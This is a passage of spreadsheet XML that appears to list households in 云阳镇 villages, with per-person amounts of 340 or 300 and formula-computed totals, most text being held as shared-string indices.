        <v>3702</v>
      </c>
      <c r="G1465" s="14">
        <v>1</v>
      </c>
      <c r="H1465" s="14">
        <v>340</v>
      </c>
      <c r="I1465" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1465" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1465" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1466" ht="23" customHeight="1" spans="1:11">
      <c r="A1466" s="13" t="s">
        <v>3946</v>
      </c>
      <c r="B1466" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1466" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1466" s="14" t="s">
        <v>3947</v>
      </c>
      <c r="E1466" s="14" t="s">
        <v>3733</v>
      </c>
      <c r="F1466" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1466" s="14">
        <v>1</v>
      </c>
      <c r="H1466" s="14">
        <v>340</v>
      </c>
      <c r="I1466" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1466" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1466" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1467" ht="23" customHeight="1" spans="1:11">
      <c r="A1467" s="13" t="s">
        <v>3948</v>
      </c>
      <c r="B1467" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1467" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1467" s="14" t="s">
        <v>3949</v>
      </c>
      <c r="E1467" s="14" t="s">
        <v>3841</v>
      </c>
      <c r="F1467" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1467" s="14">
        <v>1</v>
      </c>
      <c r="H1467" s="14">
        <v>340</v>
      </c>
      <c r="I1467" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1467" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1467" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1468" ht="23" customHeight="1" spans="1:11">
      <c r="A1468" s="13" t="s">
        <v>3950</v>
      </c>
      <c r="B1468" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1468" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1468" s="14" t="s">
        <v>3951</v>
      </c>
      <c r="E1468" s="14" t="s">
        <v>3952</v>
      </c>
      <c r="F1468" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1468" s="14">
        <v>1</v>
      </c>
      <c r="H1468" s="14">
        <v>340</v>
      </c>
      <c r="I1468" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1468" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1468" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1469" ht="23" customHeight="1" spans="1:11">
      <c r="A1469" s="13" t="s">
        <v>3953</v>
      </c>
      <c r="B1469" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1469" s="14" t="s">
        <v>3954</v>
      </c>
      <c r="D1469" s="14" t="s">
        <v>3955</v>
      </c>
      <c r="E1469" s="14" t="s">
        <v>3956</v>
      </c>
      <c r="F1469" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1469" s="14">
        <v>1</v>
      </c>
      <c r="H1469" s="14">
        <v>340</v>
      </c>
      <c r="I1469" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1469" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1469" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1470" ht="23" customHeight="1" spans="1:11">
      <c r="A1470" s="13" t="s">
        <v>3957</v>
      </c>
      <c r="B1470" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1470" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1470" s="14" t="s">
        <v>3958</v>
      </c>
      <c r="E1470" s="14" t="s">
        <v>2632</v>
      </c>
      <c r="F1470" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1470" s="14">
        <v>1</v>
      </c>
      <c r="H1470" s="14">
        <v>340</v>
      </c>
      <c r="I1470" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1470" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1470" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1471" ht="23" customHeight="1" spans="1:11">
      <c r="A1471" s="13" t="s">
        <v>3959</v>
      </c>
      <c r="B1471" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1471" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1471" s="14" t="s">
        <v>3960</v>
      </c>
      <c r="E1471" s="14" t="s">
        <v>3829</v>
      </c>
      <c r="F1471" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1471" s="14">
        <v>1</v>
      </c>
      <c r="H1471" s="14">
        <v>340</v>
      </c>
      <c r="I1471" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1471" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1471" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1472" ht="23" customHeight="1" spans="1:11">
      <c r="A1472" s="13" t="s">
        <v>3961</v>
      </c>
      <c r="B1472" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1472" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1472" s="14" t="s">
        <v>3962</v>
      </c>
      <c r="E1472" s="14" t="s">
        <v>3730</v>
      </c>
      <c r="F1472" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1472" s="14">
        <v>1</v>
      </c>
      <c r="H1472" s="14">
        <v>340</v>
      </c>
      <c r="I1472" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1472" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1472" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1473" ht="23" customHeight="1" spans="1:11">
      <c r="A1473" s="13" t="s">
        <v>3963</v>
      </c>
      <c r="B1473" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1473" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1473" s="14" t="s">
        <v>3964</v>
      </c>
      <c r="E1473" s="14" t="s">
        <v>3874</v>
      </c>
      <c r="F1473" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1473" s="14">
        <v>1</v>
      </c>
      <c r="H1473" s="14">
        <v>340</v>
      </c>
      <c r="I1473" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1473" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1473" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1474" ht="23" customHeight="1" spans="1:11">
      <c r="A1474" s="13" t="s">
        <v>3965</v>
      </c>
      <c r="B1474" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1474" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1474" s="14" t="s">
        <v>3966</v>
      </c>
      <c r="E1474" s="14" t="s">
        <v>3723</v>
      </c>
      <c r="F1474" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1474" s="14">
        <v>1</v>
      </c>
      <c r="H1474" s="14">
        <v>340</v>
      </c>
      <c r="I1474" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1474" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1474" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1475" ht="23" customHeight="1" spans="1:11">
      <c r="A1475" s="13" t="s">
        <v>3967</v>
      </c>
      <c r="B1475" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1475" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1475" s="14" t="s">
        <v>3968</v>
      </c>
      <c r="E1475" s="14" t="s">
        <v>3969</v>
      </c>
      <c r="F1475" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1475" s="14">
        <v>1</v>
      </c>
      <c r="H1475" s="14">
        <v>340</v>
      </c>
      <c r="I1475" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1475" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1475" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1476" ht="23" customHeight="1" spans="1:11">
      <c r="A1476" s="13" t="s">
        <v>3970</v>
      </c>
      <c r="B1476" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1476" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1476" s="14" t="s">
        <v>3971</v>
      </c>
      <c r="E1476" s="14" t="s">
        <v>3972</v>
      </c>
      <c r="F1476" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1476" s="14">
        <v>1</v>
      </c>
      <c r="H1476" s="14">
        <v>340</v>
      </c>
      <c r="I1476" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1476" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1476" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1477" ht="23" customHeight="1" spans="1:11">
      <c r="A1477" s="13" t="s">
        <v>3973</v>
      </c>
      <c r="B1477" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1477" s="14" t="s">
        <v>3938</v>
      </c>
      <c r="D1477" s="14" t="s">
        <v>3974</v>
      </c>
      <c r="E1477" s="14" t="s">
        <v>3975</v>
      </c>
      <c r="F1477" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1477" s="14">
        <v>1</v>
      </c>
      <c r="H1477" s="14">
        <v>340</v>
      </c>
      <c r="I1477" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1477" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1477" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1478" ht="23" customHeight="1" spans="1:11">
      <c r="A1478" s="13" t="s">
        <v>3976</v>
      </c>
      <c r="B1478" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1478" s="14" t="s">
        <v>3744</v>
      </c>
      <c r="D1478" s="14" t="s">
        <v>3977</v>
      </c>
      <c r="E1478" s="14" t="s">
        <v>2560</v>
      </c>
      <c r="F1478" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1478" s="14">
        <v>2</v>
      </c>
      <c r="H1478" s="14">
        <v>330</v>
      </c>
      <c r="I1478" s="14">
        <f t="shared" si="73"/>
        <v>660</v>
      </c>
      <c r="J1478" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1478" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1479" ht="23" customHeight="1" spans="1:11">
      <c r="A1479" s="13" t="s">
        <v>3978</v>
      </c>
      <c r="B1479" s="14" t="str">
        <f>B1478</f>
        <v>云阳镇</v>
      </c>
      <c r="C1479" s="14" t="str">
        <f>C1478</f>
        <v>大关十组</v>
      </c>
      <c r="D1479" s="41" t="s">
        <v>3979</v>
      </c>
      <c r="E1479" s="42" t="s">
        <v>880</v>
      </c>
      <c r="F1479" s="14" t="str">
        <f>F1478</f>
        <v>4113210522</v>
      </c>
      <c r="G1479" s="14"/>
      <c r="H1479" s="14"/>
      <c r="I1479" s="14"/>
      <c r="J1479" s="14"/>
      <c r="K1479" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1480" ht="23" customHeight="1" spans="1:11">
      <c r="A1480" s="13" t="s">
        <v>3980</v>
      </c>
      <c r="B1480" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1480" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1480" s="14" t="s">
        <v>3981</v>
      </c>
      <c r="E1480" s="14" t="s">
        <v>3982</v>
      </c>
      <c r="F1480" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1480" s="14">
        <v>1</v>
      </c>
      <c r="H1480" s="14">
        <v>340</v>
      </c>
      <c r="I1480" s="14">
        <f t="shared" ref="I1480:I1486" si="74">H1480*G1480</f>
        <v>340</v>
      </c>
      <c r="J1480" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1480" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1481" ht="23" customHeight="1" spans="1:11">
      <c r="A1481" s="13" t="s">
        <v>3983</v>
      </c>
      <c r="B1481" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1481" s="14" t="s">
        <v>3695</v>
      </c>
      <c r="D1481" s="14" t="s">
        <v>3984</v>
      </c>
      <c r="E1481" s="14" t="s">
        <v>3054</v>
      </c>
      <c r="F1481" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1481" s="14">
        <v>1</v>
      </c>
      <c r="H1481" s="14">
        <v>340</v>
      </c>
      <c r="I1481" s="14">
        <f t="shared" si="74"/>
        <v>340</v>
      </c>
      <c r="J1481" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1481" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1482" ht="23" customHeight="1" spans="1:11">
      <c r="A1482" s="13" t="s">
        <v>3985</v>
      </c>
      <c r="B1482" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1482" s="14" t="s">
        <v>3986</v>
      </c>
      <c r="D1482" s="14" t="s">
        <v>3987</v>
      </c>
      <c r="E1482" s="14" t="s">
        <v>3988</v>
      </c>
      <c r="F1482" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1482" s="14">
        <v>1</v>
      </c>
      <c r="H1482" s="14">
        <v>340</v>
      </c>
      <c r="I1482" s="14">
        <f t="shared" si="74"/>
        <v>340</v>
      </c>
      <c r="J1482" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1482" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1483" ht="23" customHeight="1" spans="1:11">
      <c r="A1483" s="13" t="s">
        <v>3989</v>
      </c>
      <c r="B1483" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1483" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1483" s="14" t="s">
        <v>3990</v>
      </c>
      <c r="E1483" s="14" t="s">
        <v>3991</v>
      </c>
      <c r="F1483" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1483" s="14">
        <v>1</v>
      </c>
      <c r="H1483" s="14">
        <v>340</v>
      </c>
      <c r="I1483" s="14">
        <f t="shared" si="74"/>
        <v>340</v>
      </c>
      <c r="J1483" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1483" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1484" ht="23" customHeight="1" spans="1:11">
      <c r="A1484" s="13" t="s">
        <v>3992</v>
      </c>
      <c r="B1484" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1484" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1484" s="14" t="s">
        <v>3993</v>
      </c>
      <c r="E1484" s="14" t="s">
        <v>3863</v>
      </c>
      <c r="F1484" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1484" s="14">
        <v>1</v>
      </c>
      <c r="H1484" s="14">
        <v>340</v>
      </c>
      <c r="I1484" s="14">
        <f t="shared" si="74"/>
        <v>340</v>
      </c>
      <c r="J1484" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1484" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1485" ht="23" customHeight="1" spans="1:11">
      <c r="A1485" s="13" t="s">
        <v>3994</v>
      </c>
      <c r="B1485" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1485" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1485" s="14" t="s">
        <v>3995</v>
      </c>
      <c r="E1485" s="14" t="s">
        <v>3838</v>
      </c>
      <c r="F1485" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1485" s="14">
        <v>1</v>
      </c>
      <c r="H1485" s="14">
        <v>340</v>
      </c>
      <c r="I1485" s="14">
        <f t="shared" si="74"/>
        <v>340</v>
      </c>
      <c r="J1485" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1485" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1486" ht="23" customHeight="1" spans="1:11">
      <c r="A1486" s="13" t="s">
        <v>3996</v>
      </c>
      <c r="B1486" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1486" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1486" s="14" t="s">
        <v>3997</v>
      </c>
      <c r="E1486" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1486" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1486" s="14">
        <v>2</v>
      </c>
      <c r="H1486" s="14">
        <v>300</v>
      </c>
      <c r="I1486" s="14">
        <f t="shared" si="74"/>
        <v>600</v>
      </c>
      <c r="J1486" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1486" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1487" ht="23" customHeight="1" spans="1:11">
      <c r="A1487" s="13" t="s">
        <v>3998</v>
      </c>
      <c r="B1487" s="14" t="str">
        <f>B1486</f>
        <v>云阳镇</v>
      </c>
      <c r="C1487" s="14" t="str">
        <f>C1486</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1487" s="13" t="s">
        <v>3999</v>
      </c>
      <c r="E1487" s="13" t="s">
        <v>3841</v>
      </c>
      <c r="F1487" s="14" t="str">
        <f>F1486</f>
        <v>4113210519</v>
      </c>
      <c r="G1487" s="14"/>
      <c r="H1487" s="14"/>
      <c r="I1487" s="14"/>
      <c r="J1487" s="14"/>
      <c r="K1487" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1488" ht="23" customHeight="1" spans="1:11">
      <c r="A1488" s="13" t="s">
        <v>4000</v>
      </c>
      <c r="B1488" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1488" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1488" s="14" t="s">
        <v>4001</v>
      </c>
      <c r="E1488" s="14" t="s">
        <v>4002</v>
      </c>
      <c r="F1488" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1488" s="14">
        <v>1</v>
      </c>
      <c r="H1488" s="14">
        <v>340</v>
      </c>
      <c r="I1488" s="14">
        <f>H1488*G1488</f>
        <v>340</v>
      </c>
      <c r="J1488" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1488" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1489" ht="23" customHeight="1" spans="1:11">
      <c r="A1489" s="13" t="s">
        <v>4003</v>
      </c>
      <c r="B1489" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1489" s="14" t="s">
        <v>4004</v>
      </c>
      <c r="D1489" s="14" t="s">
        <v>4005</v>
      </c>
      <c r="E1489" s="14" t="s">
        <v>4006</v>
      </c>
      <c r="F1489" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1489" s="14">
        <v>2</v>
      </c>
      <c r="H1489" s="14">
        <v>300</v>
      </c>
      <c r="I1489" s="14">
        <f>H1489*G1489</f>
        <v>600</v>
      </c>
      <c r="J1489" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1489" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1490" ht="23" customHeight="1" spans="1:11">
      <c r="A1490" s="13" t="s">
        <v>4007</v>
      </c>
      <c r="B1490" s="14" t="str">
        <f>B1489</f>
        <v>云阳镇</v>
      </c>
      <c r="C1490" s="14" t="str">
        <f>C1489</f>
        <v>镇直（初中家属院）</v>
      </c>
      <c r="D1490" s="13" t="s">
        <v>4008</v>
      </c>
      <c r="E1490" s="13" t="s">
        <v>4009</v>
      </c>
      <c r="F1490" s="14" t="str">
        <f>F1489</f>
        <v>4113210599</v>
      </c>
      <c r="G1490" s="14"/>
      <c r="H1490" s="14"/>
      <c r="I1490" s="14"/>
      <c r="J1490" s="14"/>
      <c r="K1490" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1491" ht="23" customHeight="1" spans="1:11">
      <c r="A1491" s="13" t="s">
        <v>4010</v>
      </c>
      <c r="B1491" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1491" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1491" s="14" t="s">
        <v>4011</v>
      </c>
      <c r="E1491" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1491" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1491" s="14">
        <v>2</v>
      </c>
      <c r="H1491" s="14">
        <v>300</v>
      </c>
      <c r="I1491" s="14">
        <f>H1491*G1491</f>
        <v>600</v>
      </c>
      <c r="J1491" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1491" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1492" ht="23" customHeight="1" spans="1:11">
      <c r="A1492" s="13" t="s">
        <v>4012</v>
      </c>
      <c r="B1492" s="14" t="str">
        <f>B1491</f>
        <v>云阳镇</v>
      </c>
      <c r="C1492" s="14" t="str">
        <f>C1491</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1492" s="13" t="s">
        <v>4013</v>
      </c>
      <c r="E1492" s="13" t="s">
        <v>3723</v>
      </c>
      <c r="F1492" s="14" t="str">
        <f>F1491</f>
        <v>4113210519</v>
      </c>
      <c r="G1492" s="14"/>
      <c r="H1492" s="14"/>
      <c r="I1492" s="14"/>
      <c r="J1492" s="14"/>
      <c r="K1492" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1493" ht="23" customHeight="1" spans="1:11">
      <c r="A1493" s="13" t="s">
        <v>4014</v>
      </c>
      <c r="B1493" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1493" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1493" s="14" t="s">
        <v>4015</v>
      </c>
      <c r="E1493" s="14" t="s">
        <v>4016</v>
      </c>
      <c r="F1493" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1493" s="14">
        <v>1</v>
      </c>
      <c r="H1493" s="14">
        <v>340</v>
      </c>
      <c r="I1493" s="14">
        <f t="shared" ref="I1493:I1499" si="75">H1493*G1493</f>
        <v>340</v>
      </c>
      <c r="J1493" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1493" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1494" ht="23" customHeight="1" spans="1:11">
      <c r="A1494" s="13" t="s">
        <v>4017</v>
      </c>
      <c r="B1494" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1494" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1494" s="14" t="s">
        <v>4018</v>
      </c>
      <c r="E1494" s="14" t="s">
        <v>3683</v>
      </c>
      <c r="F1494" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1494" s="14">
        <v>1</v>
      </c>
      <c r="H1494" s="14">
        <v>340</v>
      </c>
      <c r="I1494" s="14">
        <f t="shared" si="75"/>
        <v>340</v>
      </c>
      <c r="J1494" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1494" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1495" ht="23" customHeight="1" spans="1:11">
      <c r="A1495" s="13" t="s">
        <v>4019</v>
      </c>
      <c r="B1495" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1495" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1495" s="14" t="s">
        <v>4020</v>
      </c>
      <c r="E1495" s="14" t="s">
        <v>4021</v>
      </c>
      <c r="F1495" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1495" s="14">
        <v>1</v>
      </c>
      <c r="H1495" s="14">
        <v>340</v>
      </c>
      <c r="I1495" s="14">
        <f t="shared" si="75"/>
        <v>340</v>
      </c>
      <c r="J1495" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1495" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1496" ht="23" customHeight="1" spans="1:11">
      <c r="A1496" s="13" t="s">
        <v>4022</v>
      </c>
      <c r="B1496" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1496" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1496" s="14" t="s">
        <v>4023</v>
      </c>
      <c r="E1496" s="14" t="s">
        <v>3841</v>
      </c>
      <c r="F1496" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1496" s="14">
        <v>1</v>
      </c>
      <c r="H1496" s="14">
        <v>340</v>
      </c>
      <c r="I1496" s="14">
        <f t="shared" si="75"/>
        <v>340</v>
      </c>
      <c r="J1496" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1496" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1497" ht="23" customHeight="1" spans="1:11">
      <c r="A1497" s="13" t="s">
        <v>4024</v>
      </c>
      <c r="B1497" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1497" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1497" s="14" t="s">
        <v>4025</v>
      </c>
      <c r="E1497" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1497" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1497" s="14">
        <v>1</v>
      </c>
      <c r="H1497" s="14">
        <v>340</v>
      </c>
      <c r="I1497" s="14">
        <f t="shared" si="75"/>
        <v>340</v>
      </c>
      <c r="J1497" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1497" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1498" ht="23" customHeight="1" spans="1:11">
      <c r="A1498" s="13" t="s">
        <v>4026</v>
      </c>
      <c r="B1498" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1498" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1498" s="14" t="s">
        <v>4027</v>
      </c>
      <c r="E1498" s="14" t="s">
        <v>2618</v>
      </c>
      <c r="F1498" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1498" s="14">
        <v>1</v>
      </c>
      <c r="H1498" s="14">
        <v>340</v>
      </c>
      <c r="I1498" s="14">
        <f t="shared" si="75"/>
        <v>340</v>
      </c>
      <c r="J1498" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1498" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1499" ht="23" customHeight="1" spans="1:11">
      <c r="A1499" s="13" t="s">
        <v>4028</v>
      </c>
      <c r="B1499" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1499" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1499" s="14" t="s">
        <v>669</v>
      </c>
      <c r="E1499" s="14" t="s">
        <v>3773</v>
      </c>
      <c r="F1499" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1499" s="14">
        <v>2</v>
      </c>
      <c r="H1499" s="14">
        <v>300</v>
      </c>
      <c r="I1499" s="14">
        <f t="shared" si="75"/>
        <v>600</v>
      </c>
      <c r="J1499" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1499" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1500" ht="23" customHeight="1" spans="1:11">
      <c r="A1500" s="13" t="s">
        <v>4029</v>
      </c>
      <c r="B1500" s="14" t="str">
        <f>B1499</f>
        <v>云阳镇</v>
      </c>
      <c r="C1500" s="14" t="str">
        <f>C1499</f>
        <v>小关二组</v>
      </c>
      <c r="D1500" s="22" t="s">
        <v>4030</v>
      </c>
      <c r="E1500" s="22" t="s">
        <v>4031</v>
      </c>
      <c r="F1500" s="14" t="str">
        <f>F1499</f>
        <v>4113210521</v>
      </c>
      <c r="G1500" s="14"/>
      <c r="H1500" s="14"/>
      <c r="I1500" s="14"/>
      <c r="J1500" s="14"/>
      <c r="K1500" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1501" ht="23" customHeight="1" spans="1:11">
      <c r="A1501" s="13" t="s">
        <v>4032</v>
      </c>
      <c r="B1501" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1501" s="14" t="s">
        <v>3721</v>
      </c>
      <c r="D1501" s="14" t="s">
        <v>4033</v>
      </c>
      <c r="E1501" s="14" t="s">
        <v>3752</v>
      </c>
      <c r="F1501" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1501" s="14">
        <v>1</v>
      </c>
      <c r="H1501" s="14">
        <v>340</v>
      </c>
      <c r="I1501" s="14">
        <f>H1501*G1501</f>
        <v>340</v>
      </c>
      <c r="J1501" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1501" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1502" ht="23" customHeight="1" spans="1:11">
      <c r="A1502" s="13" t="s">
        <v>4034</v>
      </c>
      <c r="B1502" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1502" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1502" s="14" t="s">
        <v>4035</v>
      </c>
      <c r="E1502" s="14" t="s">
        <v>4036</v>
      </c>
      <c r="F1502" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1502" s="14">
        <v>1</v>
      </c>
      <c r="H1502" s="14">
        <v>340</v>
      </c>
      <c r="I1502" s="14">
        <f>H1502*G1502</f>
        <v>340</v>
      </c>
      <c r="J1502" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1502" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1503" ht="23" customHeight="1" spans="1:11">
      <c r="A1503" s="13" t="s">
        <v>4037</v>
      </c>
      <c r="B1503" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1503" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1503" s="14" t="s">
        <v>4038</v>
      </c>
      <c r="E1503" s="14" t="s">
        <v>4039</v>
      </c>
      <c r="F1503" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1503" s="14">
        <v>1</v>
      </c>
      <c r="H1503" s="14">
        <v>340</v>
      </c>
      <c r="I1503" s="14">
        <f>H1503*G1503</f>
        <v>340</v>
      </c>
